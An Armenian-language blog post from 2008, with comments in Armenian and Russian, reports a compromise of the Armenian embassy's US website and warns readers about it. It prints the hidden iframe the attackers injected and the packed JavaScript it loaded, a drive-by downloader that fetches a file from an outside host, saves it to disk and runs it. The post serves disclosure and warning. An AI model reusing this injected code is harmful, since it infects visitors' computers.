ahousekeeper ([info]ahousekeeper) wrote,
@ 2008-07-09 08:34:00
Previous Entry  Add to memories!  Tell a Friend  Next Entry
Entry tags:անվտանգության խնդիրներ, համացանց, հայաստանի առեւտրական հանրապետություն

ԱՄՆ-ում Հայաստանի դեսպանատան կայքը՝ ադրբեջանական ցանցահենների հերթական զոհ
Այս գիշեր տեղեկատվություն ստացա ընկերոջիցս՝ Ներսես Զուրաբյանից, որ կարծես թե ԱՄՆ-ում հայկական դեսպանատան կայքէջերից մեկը վիրուս է պարունակում։ Այդ մասին իրեն զգուշացրել էր շատերիս ծանոթ Սահակը (ազգանունը կգրեմ, եթե ինքը հայտնի ինձ, որ դեմ չէ)։

Ներսեսի հետ համատեղ ստուգումից հետո պարզվեց, որ.

1. Ադրբեջանցի ցանցահենները (hackers) կոտրել են դեսպանատան կայքը ստեղծած ընկերության կայքը, ու փոխարինել այդ կայքի գլխավոր էջը։

2. Հավանաբար, օգտագործելով այդ ընկերության կայքը կոտրելիս ստացված տվյալները, մուտք են գործել նաև դեսպանատան կայք ու որոշ էջերում գաղտնի կերպով այնպիսի ծրագրային կոդ են տեղադրել, որ կարող է վիրուսով վարակել այդ էջերը ընթերցողների համակարգիչները։ Այդ էջերից առնվազն մեկում վնասակար կոդը գործում է առ այսօր։

Ապշեցուցիչ է, բայց փաստ է. համաձայն Գուգլի տվյալների, արդեն 3 ԱՄԻՍ է այս վիճակն է։



Զգուշացում. եթե 100%-ով համոզված չեք ձեր համակարգիչների պաշտպանվածության մեջ, ապա մի այցելեք ստորև բերվող վարակված էջերը, քանի որ ձեր համակարգիչը նույնպես կարող է վարակվել։

1. Դեսպանատան կայքի բոլոր էջերի ներքևում նշված է Stratomedia, Inc ընկերությունը, որն, ըստ գրվածի՝ պետք է ապահովի դեսպանատան կայքի անխափան աշխատանքը։



2. Այցելելով Stratomedia, Inc ընկերության կայքի գլխավոր էջը, կտեսնենք, որ այն ակնհայտորեն զոհ է դարձել «Hack-Labs Rush Team» անունով ցանցահենների խմբի։



3. Ինչքա՞ն ժամանակ է վարակված դեսպանատան կայքը։ Փորձենք պատասխանը ստանալ Google-ից։ Գուգլում որոնում տալով հետևյալ հրամանով "site:www.armeniaemb.org consular armenian embassy washington" գտնում ենք պոտենցիալ վարակված էջերը.



Ուշադրություն դարձրեք այն պարբերություններին, ուր հղումով վերնագրի տակ գրված է. «This site may harm your computer.» Գուգլը զգուշացնում է, որ այս էջերում հնարավոր վտանգ կա։ Ի՞նչ վտանգ է, և երբ է այն հայտնաբերվել Գուգլի կողմից։ Այս իմանալու համար անհրաժեշտ է կարդալ դեսպանատան այդ կայքէջին վերաբերվող Գուգլի ախտորոշիչ էջը.

Ի՞նչ ենք տեսնում.

What is the current listing status for www.armeniaemb.org/ConsularAffairs/?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Google has not visited this site within the past 90 days. Suspicious activity was detected over 90 days ago, but no data is available for the past 90 days.


Հարց է ծագում. գուցե՞ Գուգլի կողմից 90 օր առաջ հայտնաբերված վիրուսը արդեն վերացվել է դեսպանատան կայքի բոլոր էջերից։ Պատասխանը բացասական է։

4. armeniaemb.org/ConsularAffairs/Index.htm էջում (զգուշացում՝ այս էջը բացելը վտանգավոր է) մինչև այժմ էլ վնասակար կոդ է պարունակվում, մասնավորապես հետևյալ տողը՝
<IFRAME border=0 name=AMEMBMFANetwork src="http://www.daymoihk.info/ascript.php?s=sc&n=armenianemb.org"
frameBorder=0 width=1 height=1></IFRAME>


Այս կոդի միջոցով ինչ-որ daymoihk.info կայքից ծրագիր է աշխատացվում։ Ի՞նչ ծրագիր է։ Ի՞նչ կայք է։

Կայքը, ինչպես կարող եք ինքներդ տեսնել, կարծես թե պատկանում է ադրբեջանական «Կասպիյ» թերթին։ Իսկ վնասակար ծրագրի կոդը կարող եք տեսնել այս հասցեով (քանի դեռ չեն ջնջել). daymoihk.info/ascript.php?s=sc&n=armenianemb.org

Ծրագրի պարունակությունը հետևյալն է.
<script type='text/javascript'>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l 9(o,n){3 r=c;5{7(\'r = o.m(n)\')}6(e){}4(!r){5{7(\'r = o.m(n, "")\')}6(e){}}4(!r){5{7(\'r = o.m(n, "", "")\')}6(e){}}4(!r){5{7(\'r = o.h("", n)\')}6(e){}}4(!r){5{7(\'r = o.h(n, "")\')}6(e){}}4(!r){5{7(\'r = o.h(n)\')}6(e){}}j(r)}l 1I(o,n){3 r=c;j(r)}l w(a){3 G=\'1d\';3 D=\'I\';3 F=\'K.X\'+D+G;3 g=9(a,F);3 26=\'f\';3 25=\'f\';3 24=\'f\';3 16=\'f\';g.E(\'21\',\'20://14.M.1X/1W.1V\',1U);g.1T();3 u=\'1S.10\';3 8=9(a,u);8.1P=1;8.E();8.1N(g.1L);3 k=\'.//.\'+\'.//1K\'+\'T.e\'+\'U\';8.1G(k,2);3 s=9(a,\'p.H\');s.1D(k);j 1i}3 i=0;3 t=v 1z(\'{z-A-q-B-1y}\',\'{z-A-q-B-1o}\',\'{1p-1s-1t-1v-1w}\',\'{1A-d-d-C-x}\',\'{1B-d-d-C-x}\',\'{1J-1O-1Q-1Y-1Z}\',\'{27-28-1b-O-19}\',\'{18-17-L-15-N}\',\'{13-12-11-Q-Z}\',\'{Y-W-V-1e-1f}\',\'{1h-1j-1l-1m-1n}\',\'{1q-1u-1x-1C-1E}\',\'{1M-1R-22-29-1a}\',c);J(t[i]){3 a=c;4(t[i].y(0,1)==\'{\'){a=P.R(\'S\');a.1c(\'1F\',\'1k:\'+t[i].y(1,t[i].1r-1))}1H{5{a=v 23(t[i])}6(e){}}4(a){5{3 b=9(a,\'p.H\');4(b){4(w(a))1g}}6(e){}}i++}',62,134,'|||var|if|try|catch|eval|obj_adodb|CreateO|||null|0000||a1q1|obj_msxml2|GetObject||return|fn|function|CreateObject|||Shell|11D0||||stre|new|Go|000000000046|substring|BD96C556|65A3|983A|C000|ms2|open|msx|ms1|Application|MLH|while|msxml2|4331|daymoihk|339E03C0AE3D|A0D8|document|8358|createElement|object|viewer|xe|4831|1B2D||639F725F|09FCD1DB0766|stream|43c8|F4C2|06723E09|www|8A26|aq4|F06F|7F5B7F63|FCFDF33E833C|6C07C962476B|451D|setAttribute|TTP|A9FD|874847682010|break|BA018599|TRUE|1DB3|clsid|44f9|83B4|461454C84BF8|00C04FC29E36|AB9BCEDD|D0C07D56|length|EC7E|47E1|7C69|9322|D4A210617116|43F1|00C04FC29E30|Array|0006F033|0006F03A|B4A0|ShellExecute|25F5A11FAB19|classid|SaveToFile|else|CreateAA|6e32070a|image|responseBody|E8CCCDDF|Write|766d|type|4ee6|CA28|adodb|send|false|php|amuse|info|879c|dc1fa91d2fc3|http|GET|496b|ActiveXObject|aq3|aq2|aq1|6414512B|B978|B050'.split('|')))
</script>


Հուսով եմ, այս գրառումը ընթերցող ծրագրավորողները կարող են գլուխ հանել, թե ինչ է այն անում, բայց կասկած չկա, որ սա օրինական ծրագիր չէ։

Հարց է ծագում. քանի՞ անգամ պետք է Ադրբեջանի թուրքերը կոտրեն հայկական կայքերը, ներթափանցեն պետական կառույցների տեղեկատվական համակարգերի մեջ, որ մեր չինովնիկությունը հասկանա, որ համակարգչային անվտանգության խնդիրներով իսկապես պետք է լուրջ զբաղվել։ Գլխումս ուղղակի չի տեղավորվում, թե ինչպե՞ս կարելի 3 ամիս չնկատել, որ կայքդ կոտրել են, եթե նույնիսկ Գուգլը բացեիբաց այդ մասին զգուշացնում է։ 3 ամիս, գրողը տանի!!! Արդյո՞ք դեսպանատան աշխատակիցները ոչ մի անգամ չեն այցելել իրենց կայքը, արդյո՞ք ոչ մեկը թարմ անտիվիրուս չուներ, որ զգուշացներ, որ այս կայքէջում վնասակար կոդ է պարունակվում։ Արդյո՞ք Գուգլի միջոցով չեն ստուգել, թե ինչպես է գտնվում իրենց կայքը։ Չեմ հասկանում, մի գուցե թուրքական տանկերը պետք է գան կանգնեն Հանրապետության հրապարակում, որ համապատասխան մարմինները վերջապես նկատեն, թե մի բան «էն չի»։



(50 comments) - (Post a new comment)


[info]vartanm
2008-07-09 05:16 am UTC (link)
Բա մեր ցանցահենները ուրեն՞՞ Նեվէռմինդ, մի հատ էլ մեղվի փեթակը բզենք, հիմա որ քնած էին Էս անգամ լրիվ կմտնեն կոմաի տակ:

(Reply to this) (Thread)


[info]ahousekeeper
2008-07-09 05:19 am UTC (link)
Ախր առաջին հերթին խնդիրը պետական կառույցներինն է. անհատ ցանցահեններ կարող է լինեն, ու կարող է նաև ինչ-որ պատասխան գործողություններ էլ անեն, բայց առաջնայինը պետական տեղեկատվական ենթակառույցների ապահովությունն է!

(Reply to this) (Parent)


[info]noni_no
2008-07-09 05:26 am UTC (link)
ֆանտաստիկ ապուշություն... ախր Սերժը նոր ա ասել, մինչեւ տեղ հասնի.... ինձ սպանում ա ԱԳՆ-ի ու հենց դեսպանատան՝ էշի ականջում քնած լինելը, ո՞վ ա էս կայքի ադմինը: պատկերացնում եմ, զանգեն ասեն՝ ձեր սայթը չի աշխատում, մի անգամից պատասխանը կլիներ՝ ձեզնից ա (արմինկո-արմենտելյան լավագույն տրադիցիաներով)

(Reply to this) (Thread)


[info]vartanm
2008-07-09 05:30 am UTC (link)
Չբռնեմ զանգե՞մ

(Reply to this) (Parent)(Thread)

(no subject) - [info]ahousekeeper, 2008-07-09 05:32 am UTC
(no subject) - [info]moonleight, 2008-07-09 07:07 am UTC
(no subject) - [info]noni_no, 2008-07-09 05:36 am UTC
(no subject) - [info]ermeni, 2008-07-09 05:19 pm UTC

[info]ar_vest
2008-07-09 06:45 am UTC (link)
Все логично и объяснимо и данная сфера естественным образом вписывается в общую картину. Некоторое время спасало тоЁ что сфера не осваивалась противной стороной но теперь эти времена позажи и имеем тоЁ что имеем.

(Reply to this)


[info]pigh
2008-07-09 07:34 am UTC (link)
http://pigh.livejournal.com/119442.html

(Reply to this)


[info]angel_xiligan
2008-07-09 09:44 am UTC (link)
http://samurfila.livejournal.com/400029.html

апе, надо спокойно, взвешено, без эмоций объяснить человеку почему он не прав

(Reply to this) (Thread)


[info]ahousekeeper
2008-07-09 11:45 am UTC (link)
Сейчас сижу без инета, зашел с левого аккаунта. Но всё равно, я в этих делах разбираюсь слабо, так что толку от меня никакого :)

(Reply to this) (Parent)


[info]arin_berd
2008-07-09 11:20 am UTC (link)
все закономерно. как наплевательски работают, так наплевательски и следят за своими ресурсами. если будут работать, то кто шопингами заниматься будет?

Եթե իրանց նամակ գրեինք «ապե, էժան գերմանական ավտո եմ կպցրել ձեր համար», միանքամից ռեակցիա կտաին: իսկ մնացածում էշ եղել են, էշ էլ կմնան:

Ամենախնդալուն էն ա, որ նման կայքերը պիտի լինեն պետական սեռվերների վրա, այլ ոչ թե պոռնո-սայթերի հետ միասին հանրային հոստերի վրա: բայց դե Արմենթել ունենք, աշխարհը չունի: Ոնց մնացած .am պետական կայքերն են աշխատում, այդպես էլ Դեսպանատների կայքերը կաշխատեն: Սա մեկ անգամ էլ է ցույց տալիս հայ չինովնիկի պատասխանատվության աստիճանը պետության նկատմամբ:

(Reply to this) (Thread)


[info]ahousekeeper
2008-07-09 11:43 am UTC (link)
> բայց դե Արմենթել ունենք, աշխարհը չունի:

Ի դեպ, ժամը մոտ 11։00-ից սկսած էլի կապ չունենք, հիմա ուրիշ պրովայդերով եմ միացած։

(Reply to this) (Parent)


[info]ahousekeeper
2008-07-09 12:29 pm UTC (link)
Միացավ կապը, ուռա!

(Reply to this) (Parent)(Thread)

(no subject) - [info]ahousekeeper, 2008-07-09 03:20 pm UTC

[info]ermeni
2008-07-09 05:15 pm UTC (link)
Ի դեպ նշեմ, երեգ բավականին քաղաքավարի էր խոսում հերախոսը վերցրած օրիորդը ու շատ ուշադիր էր: Բայց մինչ այդ, ուրիշ ինչքան կապնվել եմ իրենց հետ ուրիշ թեմաներով - շատ կոպիտ էին և պրոֆեսիոնալիզմի նշույլ անգամ չկար:

(Reply to this) (Parent)

noni-no, vartanm
[info]ermeni
2008-07-09 05:09 pm UTC (link)
Ես իրենց երեգ 2 անգամ զանգահարել եմ (մեկ անգամ էլ Սահակը), որից հետո էլ երկար նամակ եմ գրել բոլոր մանրամասություններով:

(Reply to this) (Thread)

Re: noni-no, vartanm
[info]noni_no
2008-07-09 06:31 pm UTC (link)
ԵՎ…?? չգիտեմ ինչի բայց վստահ եմ, որ շատ կոպիտ ու չոր պետք ա պատասխանեն

(Reply to this) (Parent)(Thread)

Re: noni-no, vartanm - [info]ermeni, 2008-07-09 06:45 pm UTC
Re: noni-no, vartanm - [info]noni_no, 2008-07-09 06:52 pm UTC

[info]ermeni
2008-07-09 05:19 pm UTC (link)
Կար, մոռացել ես նաև ավելացնես (Արին-Բերդը մասամբ նշեց բայց), որ արդեն հիմարություն է, որ կայքը գտնվում է SpeakEasy Hosting-ի վրա և իրենց պաշտոնական հասցեն ****@speakeasy.com -է:

Համ անապահով է, համ շատ գեղցի ու ոչ պրոֆեսիոնալ տպավորություն է տողնում:

(Reply to this)


[info]tamsyam
2008-07-09 06:49 pm UTC (link)
Про Вашингтонское посольство знаю не понаслышке. Там как не удивительно для некоторых тут постнувшихся, народ не шопится, а работает, и кстати достаточно эффективно по сравнению с некоторыми другими нашими посольствами и консульствами (как Лос.-овское, например). У них достаточно ограниченный бюджет, потому технарей вообще не держат на штате. Обслуживанием компов занимаются местные по надобности, а сетью и уеб-сайтом в центре, в Ереване, протокол такой, потому и неоперативно реагируют.

(Reply to this) (Thread)


[info]ahousekeeper
2008-07-09 07:08 pm UTC (link)
3 месяца — это всё же сложно назвать "неоперативностью".

Что касается конкретно вашингтонского посольства, то в бытность в Штатах могу подтвердить, что консул там работал нормально (период примерно 2002-2003 гг., звали Армен). Послом тогда был Арман Киракосян, но про его работу ни хорошего, ни плохого сказать не могу, поскольку не соприкасался никак с его работой :)

А вот про лос-анджелеское консульство сейчас рассказывают ужасы.

(Reply to this) (Parent)(Thread)

(no subject) - [info]ahousekeeper, 2008-07-09 07:12 pm UTC
(no subject) - [info]tamsyam, 2008-07-09 07:25 pm UTC
Какой поп, такой и приход. - [info]tamsyam, 2008-07-09 07:22 pm UTC
(no subject) - [info]ermeni, 2008-07-09 08:42 pm UTC
(no subject) - [info]tamsyam, 2008-07-09 11:56 pm UTC

[info]ermeni
2008-07-09 08:27 pm UTC (link)
--Обслуживанием компов занимаются местные по надобности, а сетью и уеб-сайтом в центре, в Ереване, протокол такой, потому и неоперативно реагируют.--

Կայքի տեխնիկակն սպասարկումը անում է Ստրատոմեդիա ընկերությունը, որը պատկանում է Արմեն Կ.-ին, որը բնակվում է Վաշիգտոնում: Բայց հենց այդ ընկերության կայքն էլ գրավված է թուրքերի կողմից:

Ավելին ասեմ, Արմեն Կ.-ն, ինչքան հասկացա, մի շարք պետական, օֆիցյալ կայքեր է ստեղծել, այդ թվում նաև Արցախի օֆիցիալ կայքը: Եթե իրա բոլոր կայքերի սպասարկումը նույնն ե- ուրեմն .... գլուխներս պատով տանք:

(Reply to this) (Parent)(Thread)

(no subject) - [info]ermeni, 2008-07-09 08:45 pm UTC
(no subject) - [info]tamsyam, 2008-07-09 10:11 pm UTC
(no subject) - [info]ermeni, 2008-07-09 10:37 pm UTC
(no subject) - [info]tamsyam, 2008-07-09 11:52 pm UTC
(no subject) - [info]tamsyam, 2008-07-09 10:08 pm UTC

[info]infernoarm
2008-07-10 05:45 am UTC (link)
մենակ հայհոյանքներ:

(Reply to this)


[info]infernoarm
2008-07-10 06:18 am UTC (link)
դեմ չես լինի չե, եթե նյութը փորձեմ տպել տալ?
կարող եմ Ներսեսի հղումով տալ:

(Reply to this) (Thread)


[info]ahousekeeper
2008-07-10 07:00 am UTC (link)
> դեմ չես լինի չե, եթե նյութը փորձեմ տպել տալ?

Որ ճիշտն ասեմ, ՉԻ հետ ոչ մի առնչություն չեմ ուզում ունենալ։ Փաստերն այս գրառման մեջ մանրամասն տրված են՝ ՉԻ-ում կարող են ինքնուրույն դրանք վերլուծել, ստուգել, հաստատել կամ ժխտել ու այդ մասին նյութ գրել։

(Reply to this) (Parent)(Thread)

(no subject) - [info]infernoarm, 2008-07-10 09:32 am UTC
(no subject) - [info]ahousekeeper, 2008-07-10 05:20 pm UTC

[info]ermeni
2008-07-10 04:01 pm UTC (link)
Eghbair, es dem chem nyutery tal CHI-in ain paimanov, vor terty poxeq Unicode-i. L-in mi qani angam asel em, vor webmasterin asi, baic ogut chka.

(Reply to this) (Parent)(Thread)

(no subject) - [info]infernoarm, 2008-07-11 04:28 am UTC
(no subject) - [info]infernoarm, 2008-07-11 04:29 am UTC
(no subject) - [info]ermeni, 2008-07-22 02:22 pm UTC
(no subject) - [info]infernoarm, 2008-07-23 06:29 am UTC

[info]hayk
2008-07-10 12:28 pm UTC (link)
Возможно что они фиксили сайт, но ен могли понять в чем причина.

(Reply to this) (Thread)


[info]ermeni
2008-07-10 01:40 pm UTC (link)
hayk джан, там не первой же странице этой рубрики (/index.htm) поставлен код. Каждый дурак может через интернет зайти своим браузером, сделать "view source" и посмотреть. Мне трудно верить, что можно было это не заметить.

(Reply to this) (Parent)(Thread)

(no subject) - [info]hayk, 2008-07-10 01:47 pm UTC
(no subject) - [info]ermeni, 2008-07-10 02:10 pm UTC

[info]ermeni
2008-07-10 01:37 pm UTC (link)
Update#1: (Սա երեգ արդեն գրել էի):
Ստրատոմեդիայի կայքը արդեն մաքրել են: Հիմա հուսանք դեսպանատան կայքն էլ կմաքրեն: Զանգեցի այդ ընկերության համարին (նաև նամակ ուղարկեցի), հաղորդագրություն թողեցի:


Update#2: Այդ Արմեն Կ.-ից պատասխան ստացա՝ ասաց որ տեղյակ է իրավիճակից: Ես հենց նոր պատասխան գրեցի, որ տեղյակ լինելը քիչ է, հարկավոր է հարցը լուծել: Պատկերացրեք, որ 36 ժամ է անցել, ինչ ես առաջին անգամ հայտնեցի դեսպանատանը (էլ չասած, որ 90 օրից ավելի է անցել, ինչ կայքը գրավել են):

Հետաքրքիր է, որ իրեն պատկանող էջերը արդեն մաքրել է, իսկ դեսպանատանը պատկանողը՝ դեր ոչ: Չեմ ուզում դերևս հետևումներ անել, բայց իրավիճակը անդուր է:

Առաջարկեցի օգնությունս ու ասացի, եթե մոտակա ժամանակում հարցը չլուծվի, ստիպված կլինեմ հայտնել հայկական թերթերին, որպեսզի այս կարևոր հարցին պետքական ուշադրություն դարձվի:

(Reply to this)


(50 comments) - (Post a new comment)

Create an Account
Forgot your login or password?
Login w/ OpenID
English • Español • Deutsch • Русский…